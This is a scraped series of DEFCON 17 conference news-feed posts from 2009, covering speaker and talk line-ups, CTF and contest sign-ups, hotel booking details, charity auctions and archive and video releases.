DJ Great Scott 2 - BW Ball
DJ Great Scott 3 - BW Ball
DJ Great Scott 4 - BW Ball
DJ Great Scott and Sailor Gloom - BW Ball
DJ Jackalope - BW Ball
DJ Jackalope - End of BW Ball
DJ Kricz Klink - BW Ball
DJ Pepse - Pool Party
DJ Pepse and Felix - Pool Party
DJ Reeves - NSB
DJ Sailorgloom and Kricz Klink - BW Ball
DJ Simo Sleevin - NSB
DJ Simo Sleevin and Scritch - NSB
DJ Undecided 1 - BW Ball
DJ Undecided 2 - BW Ball
DJ Undecided 1 - NSB
DJ Undecided 2 - NSB
DJ Undecided and Jackalope - BW Ball
Video from NSB 1
Kricz Klink and Njntrubl - BW Ball
DJ Jackalope Mix Clip

==> DEFCON 17 Early Release Videos!

https://www.defcon.org/defconrss.xml Check out some of the hot presentations from DEFCON 17! We'll be releasing all of the videos for free a few months out, but for now we've chosen a few we think you might enjoy! If you'd like to purchase the entire DVD collection of the DEFCON 17 presentations, you can do so at The Source of Knowledge website.
Failure -- Adam Savage (Video | Audio)
"Smart" Parking Meter Implementations, Globalism, and You -- Joe Grand, Jake Appelbaum, and Chris Tarnovsky (Video and Slides | Slides | Audio)
More Tricks for Defeating SSL -- Moxie Marlinspike (Video and Slides | Slides | Audio)
The Day of the Updates -- Itzik Kotler and Tomer Bitton (Slides | Audio)
Advancing Video Application Attacks with Video Interception, Recording, and Replay -- Jason Ostrom and Arjun Sambamoorthy (Slides | Audio)

==> DEFCON 17 CTF Packet Captures & Binaries Available!

https://www.defcon.org/defconrss.xml The DEFCON 17 CTF packet captures and binaries are now available via bittorrent. Enjoy!

==> DEFCON 17 Press Page Updated!

https://www.defcon.org/defconrss.xml Head on over to the DEFCON Press Page and check out the news from this year's show! You can also find the press listed on the DEFCON 17 Archives Page! If you've come across a good article on DEFCON 17 that you think should be up there, don't hesitate to send it to neil {at} defcon }dot{ org for posting!

==> DEFCON 17 Archives Page is Live!

https://www.defcon.org/defconrss.xml You can now peruse the DEFCON 17 Archives Page, which contains links to all of the presentation materials and code available, including all updated materials we have received! We'll have the printed program and press links up soon, and down the road you will be able to download all of the audio and video of the talks for free! We're working on getting a few early release videos up next week to tide you over!

==> Upload all of your DEFCON 17 Photos to pics.defcon.org!

https://www.defcon.org/defconrss.xml Help to preserve and share those DEFCON 17 memories on pics.defcon.org! If you have a DEFCON Forums account, you already have a pics account, just use the same login information. While you're at it, submit your galleries to defconpics.org as well!

==> Follow the Post-Con discussion on the DEFCON Forums

https://www.defcon.org/defconrss.xml Get over to the DEFCON Forums to join in on the post-con buzz from DEFCON 17! You can find out what people thought, find content links, and it's never too early to weigh in on next year's show. Remember, DEFCON is your con, and the best way to get involved is to get in on the discussions posted at forum.defcon.org. Have an idea for a new contest or event? It's the best place to start!

==> Autographed, White "I Hack Charities" Shirts Listed on Ebay

https://www.defcon.org/defconrss.xml Up for Auction: THREE "I hack charities" white signed T-shirts. All of the proceeds from these auctions except the eBay auction cost will be donated to "Hackers for Charities" http://johnny.ihackstuff.com/ These shirts were signed by most of the big names at Defcon 17. Anyone that attended may have seen these shirts displayed at the "Hackers for Charities" booth on Sunday. Everyone online and at Defcon has seen the black "I hack charities" T-shirts. But not many have seen the white ones. Well, that is because there were only 4 white shirts printed!! Johnny Long has 1 and the other 3 were all signed by the people below for these auctions. Each shirt is unique in the location of the signatures and the quotes written by the signers. These shirts were signed by:
Johnny Long
Dan Kaminsky
Jeff "The Dark Tangent" Moss
Kevin Mitnick
Joe "$Kingpin$" Grand
Bruce Potter
Nikita
Priest
The entire 2009 CTF winning team, and many others.
Listing URLs:
http://cgi.ebay.com/ws/eBayISAPI.dll?ViewItem&item=120458285523
http://cgi.ebay.com/ws/eBayISAPI.dll?ViewItem&item=120458285993
http://cgi.ebay.com/ws/eBayISAPI.dll?ViewItem&item=120458286499

==> DEFCON 17 Receipt Posted, Aaaand We're Spent...

https://www.defcon.org/defconrss.xml Well, we've made it back to our respective homes, with another awesome DEFCON on the books! We are now in recovery mode, and normal updating will resume next week! The DEFCON 17 Receipt of Admission is now posted! Thanks to all for making this a fantastic DEFCON!

==> Don't miss NIST's Hack the Quantum at DEFCON 17!

https://www.defcon.org/defconrss.xml Hack the Quantum, presented by the Joint Quantum Institute, National Institute of Standards and Technology and University of Maryland, and the Centre for Quantum Technologies, National University of Singapore. With a hands-on Bell-o-meter for entangled photons you can convince yourself that there are quantum effects beyond classical physics: a real qubit is offered to the participant who achieves the strongest violation of a Bell inequality. We also present a fresh attack that breaks many current quantum crypto systems, and demonstrate a photon-based quantum random number generator. Find it in Capri 114/115 Friday-Sunday at DEFCON 17!

==> The Community Delivers Great Mobile Options for DEFCON 17!

https://www.defcon.org/defconrss.xml There has been an outpouring of mobile ready and mobile friendly options from the DEFCON community this year to make your DEFCON scheduling easier! First there is a full blown (and very cool) unofficial iPhone app that has been submitted to the Apple store for review, made by Johnnie "Jedi" Pittmann (@dtjedi) and Todd Kimball (@tkimball). As of this posting, this app is not yet available from the Apple store. They have opted, pending acceptance from Apple, to make the app available via ad-hoc distribution, and will be accepting requests by email until Wednesday, July 29th at 9am PDT. The method, contact info, and possible risks are clearly outlined at http://www.group6.net/AdHoc.html From their site at http://www.group6.net/Defcon_App.html: After years of misplaced, begged, borrowed, stolen Defcon schedules, we decided to do something to help. Introducing the Defcon 17 iPhone app. Get all the up to date details on the con on your iPhone/iPod Touch. In addition to that, you can view the official Defcon RSS feed and #defcon Twitter posts. Talk and event calendars, speaker and DJ bios, and a map of the venue. Features:
- Talk Calendar
- Event Calendar
- Speaker/DJ Biographies
- Defcon RSS Feed Reader
- Twitter #defcon
Not to mention the great efforts of Darth Null to bring you an extremely useful web-based iPhone/mobile ready schedule and map application! You can find his fantastic work at http://www.darthnull.org. There are also a couple of Google calendars out there, one for events, thanks to JonM, and a full schedule at http://defcon.starthan.net/ All of these folks are coordinating together for updates, to bring you the freshest info from DEFCON 17! A huge thank you to all of them for contributing!

==> Keep Up On What's Happening At DEFCON 17!

https://www.defcon.org/defconrss.xml You can go to the DEFCON Qik Feed or our Qik group and check out what we and group members are doing at con! Use the #defcon hashtag on Twitter to search for and make defcon related tweets easier to find!

==> Metasploit Track at DEFCON 17!

https://www.defcon.org/defconrss.xml Check out all the Metasploit goodness you can absorb in the Metasploit Track at DEFCON 17! It all takes place Saturday in Track 2!
10:00 - 10:50 Breaking the "Unbreakable" Oracle with Metasploit -- Chris Gates & MC
11:00 - 11:50 Using Guided Missiles in Drive-Bys: Automatic browser fingerprinting and exploitation with Metasploit -- egypt
12:00 - 12:20 WMAP: Metasploit goes Web -- Efrain Torres
14:00 - 15:20 MetaPhish -- Val Smith, Colin Ames, David Kerb
15:30 - 16:00 MSF Telephony -- I)ruid
16:10 - 16:40 Metasploit Evolved, Meterpreter Advances, Hacking the Next Internet -- HD Moore
16:50 - 17:20 MSF Wifi -- Mike Kershaw
17:30 - 18:00 App Assessment the Metasploit Way -- David Maynor
18:10 - 18:40 Macsploitation with Metasploit -- Dino Dai Zovi
18:50 - 19:20 Metasploit Autopsy: Reconstructing the Crime Scene -- Peter Silberman & Steve Davis

==> Badge Hacking Buzz!

https://www.defcon.org/defconrss.xml Check out the Badge Hacking Contest threads on the DEFCON Forums to see what everyone is talking about bringing/using to Hack the badge this year. It might give you some inspiration!

==> The Summit at DEFCON 17

https://www.defcon.org/defconrss.xml Don't forget to attend The SUMMIT Fund Raiser for the EFF (www.eff.org): 50+ Speakers attending, 3 DJs, VIP event, Monaco Tower (TOP FLOOR), Top of the RIV, 8:30pm Thursday Night. See Forum for more info. Add to your social calendar. $30/$15 Student.

==> DEFCON 17 Badge Pre-release Info!

https://www.defcon.org/defconrss.xml Joe Grand has posted some pre-release info on the DEFCON Forums to get you started for the badge hacking contest this year. Go check it out at: https://forum.defcon.org/showthread.php?t=10655

==> DEFCON 17 Events/Contests Posted on Schedule Page!

https://www.defcon.org/defconrss.xml The specific info for events and contests has been posted in the DEFCON 17 Schedule Page! If you have an event or contest that is not posted please send hours of operation and location to neil at defcon.org, and we'll get them up!

==> DEFCON 17 Google Calendar

https://www.defcon.org/defconrss.xml JonM has been so kind as to start populating a Google calendar of the events for DEFCON 17! More events will be added as the times and locations come in!

==> DEFCON 17 CTF Quals Cartoon Write Up

https://www.defcon.org/defconrss.xml Check out this awesome write-up of the CTF Quals from one of the qualifying teams, the Sapheads! Clever and educational, it provides a great perspective on the thought processes behind solving the B300 section of the qualification round. Sounds like they plan to do more, so we'll keep an eye out! http://hackerschool.org/DefconCTF/17/B300.html

==> Hacker Jeopardy is Looking for Team Sign Ups

https://www.defcon.org/defconrss.xml From G Mark on the DEFCON Forums: THE PROPER (AND ONLY) WAY TO SIGN UP A TEAM FOR HACKER JEOPARDY. Okay, just to make sure that everyone has an equal opportunity, here are the directions to sign up your team. Don't do something else (like post a reply to Winn's thread, since it might not get read in time -- we had this problem last year.)
1. Open an e-mail to "hackerjeopardy@gmail.com"
2. Include your TEAM NAME and the real names and handles of your three (3) team players. (Privacy policy: we protect your identity unless a Fed or someone with a whole bunch of cash wants it.)
3. Explain why you are 31337 enough to play this year. Brag like you're trying to get lucky.
4. Include at least one cellphone number so we can contact you to notify if you're playing or there's a problem with your entry.
5. Send the e-mail as soon as possible, but absolutely no later than 90 minutes before the scheduled start of the round to be played.
In case of any dispute, you're wrong (unless you are an entity described in #2 above.)

==> Alternate slots for ninjas... LosT @ Con Mystery Challenge

https://www.defcon.org/defconrss.xml There are still alternate slots open for teams considering trying to register. There *may* be a way for alternate teams to knock teams from their spots on day one of the contest this year. Check out the official Mystery Challenge site at http://ten-five-seven.org

==> CannonBall Run is Back!

https://www.defcon.org/defconrss.xml The 5th Annual CannonBall Run is set to start Thursday July 30th 2009 with the first car leaving at 11:00 AM. We will start in Redondo Beach and arrive yet again at the Riviera Hotel in Las Vegas, Nevada.
website: http://moloch.org/cannonball/
DEFCON Forum: https://forum.defcon.org/forumdisplay.php?f=474
twitter: http://twitter.com/dccannonballrun
qik: http://qik.com/tommee

==> Team Fortress 2 Tournament - Only Two Days Left to Sign Up for Quals!

https://www.defcon.org/defconrss.xml Qualifiers - July 17-18. Get your teams together and mark your calendar. Qualifiers will be the evenings of July 17-18. As teams sign up, we'll work with the team captains to finalize scheduling. Also, we'll group the individual registrations together into teams for the quals as well. If you haven't signed up, please do so sooner rather than later. NOTE: you don't need a full team to sign up a team. If you've got 4 or 5 friends you want to play with, register a team and we'll fill the blanks up with individual registrations later. Sign up at: http://www.nomoose.org/dctf2/

==> Coffee Wars Call for Beans

https://www.defcon.org/defconrss.xml http://www.coffeewars.org/CallForBeans.shtml From shrdlu on the DEFCON Forums: Information for those hoping to win on our momentous Tenth Year of celebrating caffeine. You can submit your beans before Friday morning, by various arcane methods, none of which will be posted here (but email to Foofus might help). You *MUST* submit them before 10AM (or close to it), since that's when we start brewing and drinking and judging. We'll send the occasional messenger out into the massed and frightening horde if you are trying to bring it Friday morning. Coffee Wars only takes place on Friday morning. We're usually done by 11-ish, and vanished completely by Noon. You can spot most of the judges the rest of the day due to the slight vibration of their entire body (except me; I *like* that much caffeine).

==> DEFCON 17 Artwork Contest Winners!

https://www.defcon.org/defconrss.xml Congratulations to the winners of the DEFCON 17 Artwork Contest!
People's Choice: "Watchmen Parody" by Mar
T-shirt Category: "Floppy" by JesseK
Poster Category: "DEFCON 17" by Steve Andrus
Bumper Sticker Category: "Tailing The Elite Hacker" by downtownDB
Honorable Mention goes out to "DT Has a Posse" by Mar! Thank you to all of the entrants for their great work!

==> DEFCON 17 Speaking Schedule is Live and Final Speakers are Posted!

https://www.defcon.org/defconrss.xml That's right! The DEFCON 17 Schedule is now live! It may experience a few minor changes before all is said and done, but it is pretty much good to go! Events will be posted on the schedule page as exact times roll in, so keep your eyes peeled for updates! If you are a speaker and see any discrepancies, pass them along to talks at defcon dot org. Go have a look, and while you're at it, check out the last batch of awesome speakers we have lined up for you this year:
Preparing for Cyber War: Strategy and Force Posture in the Information-Centric World -- Dmitri Alperovitch, Marcus Sachs, Phyllis Schneck and Ed Skoudis
Hello, My Name is /hostname/ -- Endgrain, Dan Kaminsky and Tiffany Rad
Dradis Framework - Sharing Information will get you Root -- etd
0-day, gh0stnet and the Inside Story of the Adobe JBIG2 Vulnerability -- Matt Richard and Steven Adair
Three Point Oh. -- Johnny Long
Reverse Engineering By Crayon: Game Changing Hypervisor Based Malware Analysis and Visualization -- Danny Quist and Lorie M. Liebrock
Cracking 400,000 Passwords, or How to Explain to Your Roommate why the Power Bill is a Little High -- Matt Weir and Sudhir Aggarwal
Catching DNS Tunnels with AI -- Jhind
Perspective of the DoD Chief Security Officer -- Robert Lentz

==> Big Speaker Update on defcon.org! Adam Savage to speak at DEFCON 17!

https://www.defcon.org/defconrss.xml Check out the big old list of hotness on https://www.defcon.org, we have just added 39 more speakers to the site! There are only a few speakers yet to post, and the schedule is being webbified into a more mobile-friendly format (than past years) as we speak, so expect more updates in the next couple of days! You may have already heard on Twitter, it is our pleasure to officially announce that Adam Savage of MythBusters fame will be speaking this year at DEFCON! So get on over to defcon.org and check it all out, and remember to follow us on Twitter for updates as they occur!

==> Voting is Open for the DEFCON 17 Artwork Contest!

https://www.defcon.org/defconrss.xml Here's what you do: go to the DEFCON 17 Artwork Contest Gallery on pics.defcon.org and pick your favorite. Then head on over here and vote in the poll! The default display for the gallery is 12 items per page, so make sure you check out all 3 pages. There are 29 entries total. Good Luck to all the fantastic entries!

==> DEFCON 17 DJ pages are live!

https://www.defcon.org/defconrss.xml Check out the new DJ pages on the DEFCON 17 site! You can find line-ups for the Black & White Ball, Pool Parties, and daytime Chillout area! There are also artist bios and samples of the music you might encounter! It's all at https://www.defcon.org/html/defcon-17/dc-17-djs.html! And don't forget to follow the DEFCON Twitter feed for news as it happens, leading up to and during DEFCON 17!

==> Thursday Talks Line-up at DEFCON 17

https://www.defcon.org/defconrss.xml This year, we're packing even more goodness into Thursday's activities, with a half day of talks aimed at the DEFCON n00b. These talks will cover everything from basic hacking skills to what our beloved con is about, and how to get the most out of it. If you are new to DEFCON, or feel like you could get more out of it, this "basic training" will be an invaluable resource!
DEFCON 101 -- HighWiz, The Dark Tangent, Russr, DJ Jackalope, Deviant Ollam, Thorn, ThePrez98, LosT, Siviak
Pre-Con Introduction to Lock Picking -- Alek Amrani
DEFCON 1 - A Personal Account -- Dead Addict
Con Kung-Fu: Defending Yourself @ DEFCON -- Rob "Padre" DeGulielmo
Hardware Black Magic - Building devices with FPGAs -- Dr. Fouad Kiamilev
DCFluX in: The Man with the Soldering Gun -- Matt Krick "DCFluX"
Effective Information Security Career Planning -- Lee Kushner and Mike Murray
DC Network Session -- Lockheed
So You Got Arrested in Vegas... -- Jim Rennie
Hacking with GNURadio -- Videoman

==> Mystery Challenge Registration Update

https://www.defcon.org/defconrss.xml Mystery Challenge Registration Update. Congratulations to the following teams:
1. Team Silverlock
2. Team Psychoholics
3. Team Kuro
4. MobileDisco
5. Team Render
6. Team Security Catalyst
7. Team Lords of Failure
8. DEADC0DE
9. Team America (@#$& YEAH!)
There are still a few slots available. Are YOU up to the challenge? 1o57

==> Even More DEFCON 17 Speaker Updates!

https://www.defcon.org/defconrss.xml Yes folks, yet another batch of great talks has been posted on the speaker page! That should do it for this week, but stay tuned next week for the last batches of talks to go up!
Panel - Ask EFF: The Year in Digital Civil Liberties -- Kurt Opsahl, Jennifer Granick, Kevin Bankston, Fred von Lohmann, Marcia Hofmann and Peter Eckersley
Panel - Meet the Feds 2009
The Middler 2.0: It's Not Just for Web Apps Anymore -- Jay Beale and Justin Searle
Beckstrom's Law - A Model for Valuing Networks and Security -- Rod Beckstrom
Sharepoint 2007 Knowledge Network Exposed -- Digividual
Socially Owned in the Cloud -- Digividual
Personal Survival Preparedness -- Steve Dunker and Kristie Dunker
Social Zombies: Your Friends Want to Eat Your Brains -- Tom Eston and Kevin Johnson
Cracking the Poor and the Rich: Discovering the Relationship Between Physical and Network Security -- Damian Finol
FOE -- Feeding Controversial News to Censored Countries (Without Using Proxy Servers) -- Sho bleep
Hardware Black Magic - Building devices with FPGAs -- Dr. Fouad Kiamilev
Hack The Textbook -- Jon R. Kibler and Mike Cooper
Advanced SQL Injection -- Joseph McCray
Weaponizing the Web: New Attacks on User-generated Content -- Shawn Moyer and Nathan Hamiel
Automated Malware Similarity Analysis -- Daniel Raygoza
The Security Risks of Web 2.0 -- David Rook
Proxy Prank-o-Matic -- Charlie Vedaa and "Anonymous secondary speaker"

==> CTF Quals Are Over, But There are Other Bases to Belong

https://www.defcon.org/defconrss.xml The CTF Quals round has ended! DEFCON congratulates the qualifying teams! From ddtek.biz, the qualified teams:
1. sk3wlm4st3r (CONFIRMED! as sk3wl0fr00t)
2. Team Awesome (aka VedaGodz) (CONFIRMED!)
3. Sexy Pwndas (unconfirmed)
4. PLUS (unconfirmed)
5. Shellphish (CONFIRMED!)
6. Song of Freedom (CONFIRMED!)
7. lollerskaterz dropping from roflcopters (CONFIRMED!)
8. Underminers (unconfirmed)
9. Routards (CONFIRMED!)
10. WOWHACKER (CONFIRMED!)
alt. Sapheads_ (CONFIRMED!)
alt. sutegoma (CONFIRMED!)
alt. CLiP (unconfirmed)
alt. pebkac (unconfirmed)
alt. ACMEPharm (unconfirmed)
If you didn't make it and still want a mind bending challenge at DEFCON this year, there are a few slots left in LosT's Mystery Challenge, so wrangle up a team and get to ten-five-seven.org to find clues on how to enter! Open CTF will also be back this year, bigger and badder than ever if you need that attack/defend goodness!

==> DEFCON 17 Speaker Update

https://www.defcon.org/defconrss.xml Here are a few more talks to keep you going! We have a bunch more coming through the end of the week, so stay tuned. Follow the DEFCON Twitter Feed for announcements as they are posted!
BitTorrent Hacks -- Michael Brooks and David Aslanian
Unfair Use - Speculations on the Future of Piracy -- Dead Addict
DEFCON 1 - A Personal Account -- Dead Addict
Con Kung-Fu: Defending Yourself @ DEFCON -- Rob "Padre" DeGulielmo
Router Exploitation -- FX
Jackpotting Automated Teller Machines -- Barnaby Jack
Something about Network Security -- Dan Kaminsky
Malware Freak Show -- Nicholas J. Percoco and Jibran Ilyas
That Awesome Time I Was Sued For Two Billion Dollars -- Jason Scott
Good Vibrations: Hacking Motion Sickness on the Cheap -- Tottenkoph

==> DEFCON 17 News

https://www.defcon.org/defconrss.xml Keep your eyes on the DEFCON 17 site for a page coming soon that will give you the lowdown on all the great DJs that will spin at DEFCON this year. We'll have pics and bios, as well as sample tracks for download! Also, due to the great number of awesome talks we're accepting in the 1200 second spotlight, we've decided to make a fifth track for turbo/breakout talks! So keep watching for more updates, and as always, you can follow the DEFCON Twitter feed for links to the info as it's posted!

==> DEFCON 17 CFP Update

https://www.defcon.org/defconrss.xml If you submitted a CFP and have not been notified of its status, hold tight! We have a lot of submissions this year that we want to accept. If you haven't heard back from us by now, you're still in consideration for a time slot. We're probably trying to find room for you. Sorry we missed our June 1st notification date, but we have too much awesome sauce for our burgers. An update will be posted to the website when we have finished our selection process; all CFP submitters will be sent an email of their status at that point. Thanks!

==> Thursday (July 30th) at DEFCON 17

https://www.defcon.org/defconrss.xml In the past, we have usually opened up registration and swag midday Thursday for those early birds that want to get a jump on things before the con officially starts. There are also a few unofficial events and gatherings, like the Toxic BBQ and theSummit, that make Thursday almost an extra day of DEFCON. This year, we're packing even more goodness into Thursday's activities, with a half day track of talks aimed at the DEFCON newb. These talks will cover everything from basic hacking skills to what our beloved con is about, and how to get the most out of it. If you are new to DEFCON, or feel like you could get more out of it, this "basic training" will be an invaluable resource! In addition, the Chill Out Area will be open for hanging out and the infamous DEFCON wireless network will be up and running, so you can pwn or be pwned right out of the gate! Stay tuned for a complete listing of all the great talks planned for Thursday, and as always, you can get instant updates as they occur by following the DEFCON Twitter feed!

==> DEFCON 17 Mystery Challenge Update

https://www.defcon.org/defconrss.xml LosT can neither confirm nor deny that registration is currently open for the LosT@Con Mystery Challenge. See Ten-Five-Seven.org for updates. Kuni welcomes you to the wheel of fish.

==> Updates and Reminders for DEFCON 17

https://www.defcon.org/defconrss.xml Riviera Rooms: Be sure to book your room for this year's DEFCON! The Riviera is offering a DEFCON 17 special room rate of $89/night for 1-2 guests, add $20/night for guests 3-4. Hurry, space is limited, and our block usually sells out early!
New DJ Organizer: Welcome to DJ Great Scott, who has accepted the mantle of DJ organizer for DEFCON 17. He will be the overlord of the Black and White Ball and the Poolside DJ action! Get hold of him on the Forums (greatscott) or at blackandwhitedjs@gmail.com if you want to spin!
Capture the Flag: CTF Quals Registration ends 6/4/09! Get your teams together and get in there! Register at: http://ddtek.biz/ctf/register.html
Artwork Contest: Only about 2 weeks left in the DEFCON 17 Artwork Contest! Make some hacker art and win fabulous prizes (like free entry to DEFCON 17 and swag!) Rules posted at: https://www.defcon.org/html/defcon-17/dc-17-artwork-contest.html
Contest & Events: Check out the Contests and Events section of the forums to see what's new! TommEE Pickles has resurrected the CannonBall Run, there's a new game called the 10,000 Cent Hacker Pyramid, and Coffee Wars is having its 10th birthday! Extended hours at the pool mean Pool Party! As always, follow the DEFCON Twitter for all the announcements as they occur!

==> New DEFCON Tools Page is Live!

https://www.defcon.org/defconrss.xml Check out the DEFCON Tools page, a new section of the archives that collects the innovative tools released at DEFCON talks over the years! We currently have a list of the tools released at DEFCON 16, and are working backward to archive the tools from past shows. Special thanks to Mubix (aka Rob Fuller), of room362.com, for graciously collecting and writing up this content! All the tools Mubix could find are archived on the DEFCON media server. If you have access to a tool that is not locally stored, let us know at neil [at] defcon ]dot[ org and we'll get it up there!

==> More Talks for DEFCON 17!

https://www.defcon.org/defconrss.xml Here's another great round of talks to get you excited for DEFCON 17!
DefCon 101 -- HighWiz, The Dark Tangent, Russr, DJ Jackalope, Deviant Ollam, Thorn, ThePrez98, Lost, Siviak
Session Donation -- Alex Amrani
Sniff Keystrokes With Lasers/Voltmeters - Side Channel Attacks Using Optical Sampling Of Mechanical Energy And Power Line Leakage -- Andrea Barisani and Daniele Bianco
Hijacking Web 2.0 Sites with SSLstrip--Hands-on Training -- Sam Bowne
Attacking SMS. It's No Longer Your BFF -- Brandon Dixon
Breaking the "Unbreakable" Oracle with Metasploit -- Chris Gates and Mario Ceballos
Injectable Exploits: Two New Tools for Pwning Web Apps and Browsers -- Kevin Johnson, Justin Searle and Frank DiMaggio
eXercise in Messaging and Presence Pwnage -- Ava Latrope
Defcon Security Jam 2: The Fails Keep on Coming -- David Mortman
Hacking Sleep: How to Build Your Very Own Sleep Lab -- Ne0nRa1n and Keith Biddulph
RFID MythBusting -- Chris Paget
Search And Seizure Explained - They Took My Laptop! -- Tyler Pitchford, Esq.
Fragging Game Servers -- Bruce Potter and Logan Lodge
Hackerspaces: The Legal Bases -- RogueClown
Debaze - A Remote Method Enumeration Tool for Flex Servers -- Jon Rose
Bluetooth, Smells Like Chicken. -- Dominic Spill, Michael Ossmann and Mark Steward
"I Am Walking Through a City Made of Glass and I Have a Bag Full of Rocks" (Dispelling the Myths and Discussing the Facts of Global Cyber-Warfare) -- Jayson Street
Dangerous Minds: The Art of Guerrilla Data Mining -- Mark Ryan Del Moral Talabis
Follow us on Twitter!

==> DEFCON 17 Speaker Update!

https://www.defcon.org/defconrss.xml The CFP is now closed and selection is in full swing! Check out the latest batch of talks selected for DEFCON 17!
Unmasking You -- Joshua D. Abraham and Robert Hansen
Confidence Game Theater -- cough
Death of Anonymous Travel -- Sherri Davidoff
Using Guided Missiles in Drive-Bys: Automatic browser fingerprinting and exploitation with Metasploit -- Egypt
"Smart" Parking Meter Implementations, Globalism, and You (aka Meter Maids Eat Their Young) -- Joe "Kingpin" Grand, Jake Appelbaum, and Chris Tarnovsky
The Psychology of Security Unusability -- Peter Gutmann
Effective Information Security Career Planning -- Lee Kushner and Mike Murray
Abusing Firefox Addons -- Roberto Suggi Liverani and Nick Freeman
Clobbering the Cloud -- Haroon Meer and Marco Slaviero
RAID Recovery: Recover your bleep by Sight and Sound -- Scott Moulton
Protecting Against and Investigating Insider Threats (A methodical, multi-pronged approach to protecting your organization) -- Antonio "Tony" Rucci
PLA Information Warfare Development Timeline and Nodal Analysis -- Zulu Meet
Be sure to follow the DEFCON Twitter Feed for speaker updates and other announcements as they occur!

==> Notice to DEFCON 17 CFP Submitters

https://www.defcon.org/defconrss.xml This is just a general reminder: we want to make sure all the submissions sent to us get a fair shot and are reviewed equally. We don't want any submissions missed, so we send you an email to let you know it arrived safely. You should receive an acknowledgment of your submission within 48 hours after you have submitted. If you have not received an email from us, please resend your submission to talks at defcon dot org.

==> DEFCON 17 CFP Extended over Weekend!

https://www.defcon.org/defconrss.xml That's right slackers, you now have until Monday, May 18th to turn in your DEFCON CFP Submission! We want your insightful and interesting research to make it to the DEFCON 17 Stage! So get on it, what are you doing reading this? Go work on your submission! You can read the submission rules and get the CFP form at: https://www.defcon.org/html/defcon-17/dc-17-cfp.html

==> DEFCON 17 Talks Update

https://www.defcon.org/defconrss.xml Here are a few more of the talks chosen for DEFCON 17 to whet your appetite:

Why Tor is Slow, and What We're Doing About It - Roger Dingledine
Managed Code Rootkits - Hooking into Runtime Environments - Erez Metula
Maximum CTF: Getting the Most Out of Capture the Flag - Psifertex
Hacking, Biohacking, and the Future of Humanity - Richard Thieme

As always, we will be posting these talks as they are chosen, so keep your eyes on the speakers page! Better yet, follow the DEFCON Twitter Feed for up to the minute notification of new talks, and all of the announcements relating to DEFCON 17!

==> The Mystery Challenge Has a New Home! Team Registration Opening Soon!

https://www.defcon.org/defconrss.xml The much loved and anticipated LosT@Con Mystery Challenge has a new home on the web at https://ten-five-seven.org! LosT informs us that team registration for this year's challenge will be opening soon, so keep your eyes peeled on the new site, and on the Mystery Challenge Forum on the DEFCON Forums for all the details on how to enter and for clues relating to the challenge!

==> DEFCON 17 Artwork Contest is Open!

https://www.defcon.org/defconrss.xml It's that time again, art ninjas! Whip out your favorite medium and get to creating, because the official DEFCON 17 Artwork Contest is now underway and will run from now until June 15, 2009. The goal for this year's artwork contest is to create a piece of art you would see plastered on a wall, mailbox, telephone pole or bumper of a car in the nearest urban center. What we're looking for is an underground feel, reminiscent of DIY 'zines, gig posters, or pulp comics... (Read on)

==> More DEFCON 17 Talks Selected!

https://www.defcon.org/defconrss.xml Speaker selection is underway; here are a few of the chosen talks! Expect more early to mid next week!

Win at Reversing: Tracing and Sandboxing through Inline Hooking - Nick Harbour
Computer and Internet Security Law - A Year in Review 2008 - 2009 - Robert Clark
Making Fun of Your Malware - Michael Ligh & Matthew Richard
De Gustibus, or Hacking your Tastebuds - Sandy Clark "Mouse"
Hacking UFOlogy 102: The Implications of UFOs for Life, the Universe, and Everything - Richard Thieme

For all of the latest updates as they occur, be sure to follow us on Twitter at https://twitter.com/_defcon_

==> DEFCON 17 Site and First Round of Speakers are Live!

https://www.defcon.org/defconrss.xml The first round of speakers has been chosen, with another to follow soon! You can check them out on the DEFCON 17 site, which is now live and will contain all the info for this year's con!

==> The Riviera - Good Changes for DEFCON 17

https://www.defcon.org/defconrss.xml This year at the Riv we'll see some nice changes to some of the pricing and policies of the hotel. Some initial RIV updates from the Dark Tangent on the DEFCON Forums:

1 - Room prices have been dropped to $89/Day and should be reflected here soon: http://www.rivierahotel.com/resnet/roomres.asp?ID=309 If you booked under the old prices I _think_ the pricing will automagically be reflected in your bill as the new room block price.
2 - We will get the pool to 11pm for swimming and hanging out. We can do low key DJ action till then. We are currently talking with them to determine how we can keep it longer.
3 - Drink prices on beer and booze have been reduced. I'll update this post when I have accurate information.

We'll post more updates and details as they become available!

==> DEFCON 17 Booking Rate for the Riviera is Live

https://www.defcon.org/defconrss.xml Time to book those rooms for DEFCON 17. The Riviera has posted the booking info for this year's show. They are offering a rate of $102USD per night for 1-2 guests (add $20USD for additional guests up to 4). Note: The Nevada State Senate passed a law to increase room tax to 12% effective July 1, 2009. The tax increase will apply to all rooms occupied on and after July 1, 2009 regardless of when the reservation was made. You can acquire your room online at the following url: http://www.rivierahotel.com/resnet/roomres.asp?ID=309

==> DEFCON 17 CTF Qualifier announced despite Conficker

https://www.defcon.org/defconrss.xml FOR IMMEDIATE RELEASE 1 APRIL 2009

DEFCON CTF QUALIFIER ANNOUNCED

Defense Diutinus Technologies Corp (ddtek) is pleased to announce the round of qualification for DEFCON 17 CTF. The competition will be held on 5-7 June - without a stop, participants can be located everywhere. All are to play, but only the 9 best groups will be invited to join us in Las Vegas for the annual DEFCON ninja square off. We also intend to honour the code of the former CTF host and automatically qualify last year's champion, the sk3wl of r00t (although we sincerely hope they participate in qualifications). The qualification round will be in the style of a game board, but answers need not be in the form of a question. Categories will require teams to demonstrate the superiority of hacking into a vast realm of security. You must be registered to participate.

Registration site: http://ddtek.biz/ctf/register.html
Registration opens: 01.04.2009 00:00:00 UTC
Registration ends: 04.06.2009 00:00:00 UTC
Qualifications open: 05.06.2009 23:00:00 UTC
Qualifications end: 07.06.2009 23:00:00 UTC

More information will follow via your registered email address. Bring all your l33t haxor skillz, just leave your Kiddie toolz behind.

Vulc@n Difensiva
Senior Engineer
Diutinus Defense Technologies, Inc.

==> DEFCON CNN Interview

https://www.defcon.org/defconrss.xml DEFCON's very own Russ Rogers was interviewed on CNN about the con and the motivations behind the Conficker Worm. Check it out!

==> New Format for DEFCON 15 & 16 Archives!

https://www.defcon.org/defconrss.xml Check out the new format for the DEFCON Archives! DC15 and DC16 have been converted, and the rest are being ported over as we speak! The new format combines links to Presentations in audio & video, Media RSS feeds, Conference Programs, Press from the show, and more into one easy page for each past DEFCON.

DEFCON 16 Archive: https://www.defcon.org/html/links/dc-archives/dc-16-archive.html
DEFCON 15 Archive: https://www.defcon.org/html/links/dc-archives/dc-15-archive.html

Check 'em out!

==> Redesigned DEFCON Site Beta is Live!

